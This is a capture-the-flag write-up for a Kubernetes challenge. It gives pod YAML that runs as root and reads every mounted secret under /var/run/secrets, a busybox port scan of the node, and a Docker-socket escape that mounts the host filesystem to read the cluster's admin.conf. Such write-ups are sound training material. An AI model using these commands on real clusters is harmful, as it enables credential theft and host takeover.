1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
Using `kubectl auth can-i --list` we find we can only create pods and look at their logs, but not exec into them.
If we try the payload from the previous stage, we also find that there are now pod security policies in effect.
It mentions we're using the baseline policy, which is described [here](https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline).
Initially, I created a pod such as below to dump all the secrets being mounted, which included a token for the default service account for the namespace. I was hoping this would have more permissions, but it ended up a dead end.
```yaml
apiVersion: v1
kind: Pod
metadata:
name: get-sa-token
spec:
containers:
- name: get-sa-token
image: busybox
imagePullPolicy: IfNotPresent
securityContext:
runAsUser: 0
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do find /var/run/secrets -exec cat {} \\; ; sleep 30; done;" ]
```
Inspecting the running container though, we can see the IP of the host that runs it is `10.0.27.88`.
We use the built in `pscan` function of busybox to port scan this IP - we do this because sometimes kubelets are misconfigured to allow anonymous access or similar, so we want to investigate. (the exact arg was `"while true; do pscan -P 10000 10.0.27.88; sleep 30; done;"`).
After trying to access the kubelet and failing, the only other open port other than SSH is port 2375.
Googling for it, this port usually indicates an unauthenticated docker socket.
Unfortunately we don't have a docker CLI available to interact directly, so we need to use their [API](https://docs.docker.com/engine/api/v1.42/) directly, using wget.
The container we create is equivalent to `docker run -v /:/host --user=0 busybox cat /host/etc/kubernetes/admin.conf`, and we then read the output through the logs endpoint. Unfortunately I lost my exact payloads for this :(.
Once we have this, we list the secrets and print them out as before to get the flag.
I found out later this wasn't actually the intended solution - turns out you have permission to edit the namespace so you can just remove the pod security policy and do the same as k8s 4.
|